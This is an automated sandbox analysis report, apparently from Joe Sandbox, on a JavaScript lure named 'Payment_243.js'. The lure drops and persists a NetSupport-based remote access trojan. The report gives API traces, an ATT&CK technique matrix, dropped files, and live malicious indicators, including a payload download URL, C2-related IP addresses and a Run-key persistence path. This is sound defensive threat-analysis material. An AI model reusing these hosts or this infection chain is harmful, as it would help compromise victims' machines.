                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoA,4_2_1116C24E
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11174796
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_69D1DB7C
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_69D0FAE1
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_69D11DB6
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_69D11CC1
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoA,4_2_69D1DC99
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_69D1DC56
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_69D10F39
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_69D11EB8
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_69D11E5D
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_69D121DC
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: EnumSystemLocalesA,4_2_69D12151
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_69D12175
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_69D12089
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\i99ekubc.zip VolumeInformationJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F37A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,4_2_11134830
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103BA70
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_1117594C
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,4_2_11146010
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070430
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CEA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,4_2_69CEA980
                                Source: Yara matchFile source: 4.2.client32.exe.72b40000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.73620000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.a10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.client32.exe.a10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.69ce0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3968, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information22
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		22
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Disable or Modify Tools                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		5
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		4
                                Obfuscated Files or Information                                		Security Account Manager4
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		5
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                Software Packing                                		NTDS35
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		16
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		113
                                Process Injection                                		1
                                DLL Side-Loading                                		LSA Secrets251
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		1
                                File Deletion                                		Cached Domain Credentials2
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Masquerading                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Valid Accounts                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing1
                                Remote System Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd113
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1591023 Sample: Payment_243.js Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 31 Suricata IDS alerts for network traffic 2->31 33 Multi AV Scanner detection for dropped file 2->33 35 JavaScript source code contains functionality to generate code involving HTTP requests or file downloads 2->35 37 3 other signatures 2->37 6 wscript.exe 1 54 2->6         started        process3 dnsIp4 23 45.155.249.215, 49163, 80 MEER-ASmeerfarbigGmbHCoKGDE Germany 6->23 15 C:\ProgramData\...\webmvorbisencoder.dll, PE32 6->15 dropped 17 C:\ProgramData\i99ekubc\webmmux.dll, PE32 6->17 dropped 19 C:\ProgramData\i99ekubc\remcmdstub.exe, PE32 6->19 dropped 21 8 other files (6 malicious) 6->21 dropped 39 System process connects to network (likely due to code injection or exploit) 6->39 41 Benign windows process drops PE files 6->41 43 Deletes itself after installation 6->43 45 Windows Scripting host queries suspicious COM object (likely to drop second stage) 6->45 11 client32.exe 15 6->11         started        file5 signatures6 process7 dnsIp8 25 185.157.213.71, 443, 49164 TVHORADADAES Spain 11->25 27 172.67.68.212, 49165, 49166, 49167 CLOUDFLARENETUS United States 11->27 29 geo.netsupportsoftware.com 11->29 47 Multi AV Scanner detection for dropped file 11->47 49 Contains functionalty to change the wallpaper 11->49 51 Delayed program exit found 11->51 53 Contains functionality to detect sleep reduction / modifications 11->53 signatures9

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Payment_243.js3%VirustotalBrowse
                                Payment_243.js3%ReversingLabs

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\i99ekubc\HTCTL32.DLL16%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\i99ekubc\PCICHEK.DLL18%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\i99ekubc\PCICL32.DLL18%ReversingLabsWin32.Trojan.NetSupport
                                C:\ProgramData\i99ekubc\TCCTL32.DLL5%ReversingLabs
                                C:\ProgramData\i99ekubc\client32.exe32%ReversingLabsWin32.Trojan.NetSupport
                                C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                                C:\ProgramData\i99ekubc\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\i99ekubc\pcicapi.dll16%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\i99ekubc\remcmdstub.exe29%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\i99ekubc\webmmux.dll0%ReversingLabs
                                C:\ProgramData\i99ekubc\webmvorbisencoder.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com0%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://45.155.249.215/xxx.zip?mt=63640%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://185.157.213.71/fakeurl.htm0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp11(L0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    		high
                                    http://45.155.249.215/xxx.zip?mt=6364true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://185.157.213.71/fakeurl.htmfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/apache/incubator-echarts/issues/11369Payment_243.jsfalse
                                      		high
                                      http://www.netsupportsoftware.comclient32.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0Payment_243.jsfalse
                                        		high
                                        http://www.pci.co.uk/supportclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://%s/testpage.htmwininet.dllclient32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                          		high
                                          http://www.pci.co.uk/supportsupportclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ocsp.thawte.com0client32.exe.0.drfalse
                                            		high
                                            https://github.com/apache/echarts/issues/14266Payment_243.jsfalse
                                              		high
                                              http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jsbench.me/2vkpcekkvw/1)Payment_243.jsfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://%s/testpage.htmclient32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://0.30000000000000004.com/Payment_243.jsfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://127.0.0.1client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                		high
                                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jsPayment_243.jsfalse
                                                  		high
                                                  http://www.symauth.com/cps0(HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                                    		high
                                                    https://momentjs.com/Payment_243.jsfalse
                                                      		high
                                                      https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)Payment_243.jsfalse
                                                        		high
                                                        http://%s/fakeurl.htmclient32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://github.com/apache/incubator-echarts/issues/12229Payment_243.jsfalse
                                                          		high
                                                          http://geo.netsupportsoftware.com/location/loca.aspeclient32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0client32.exe.0.drfalse
                                                              		high
                                                              https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperationPayment_243.jsfalse
                                                                		high
                                                                https://www.thawte.com/cps0/webmvorbisencoder.dll.0.drfalse
                                                                  		high
                                                                  http://www.symauth.com/rpa00HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                                                    		high
                                                                    https://www.thawte.com/repository0Wwebmvorbisencoder.dll.0.drfalse
                                                                      		high
                                                                      http://www.netsupportschool.com/tutor-assistant.asp11(Lclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/ecomfe/zrender/blob/master/LICENSE.txtPayment_243.jsfalse
                                                                        		high
                                                                        https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).Payment_243.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jsPayment_243.jsfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          45.155.249.215
                                                                          		unknownGermany
                                                                          		34549MEER-ASmeerfarbigGmbHCoKGDEtrue
                                                                          172.67.68.212
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          185.157.213.71
                                                                          		unknownSpain
                                                                          		50129TVHORADADAESfalse

                                                                          General Information

                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1591023
                                                                          Start date and time:2025-01-14 16:23:43 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 4s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • GSI enabled (Javascript)
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Payment_243.js
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.evad.winJS@3/26@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 84%
                                                                          • Number of executed functions: 132
                                                                          • Number of non-executed functions: 261
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .js

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          07:25:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\i99ekubc\client32.exe
                                                                          07:25:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\i99ekubc\client32.exe
                                                                          10:24:41API Interceptor405x Sleep call for process: wscript.exe modified
                                                                          10:25:47API Interceptor76147x Sleep call for process: client32.exe modified

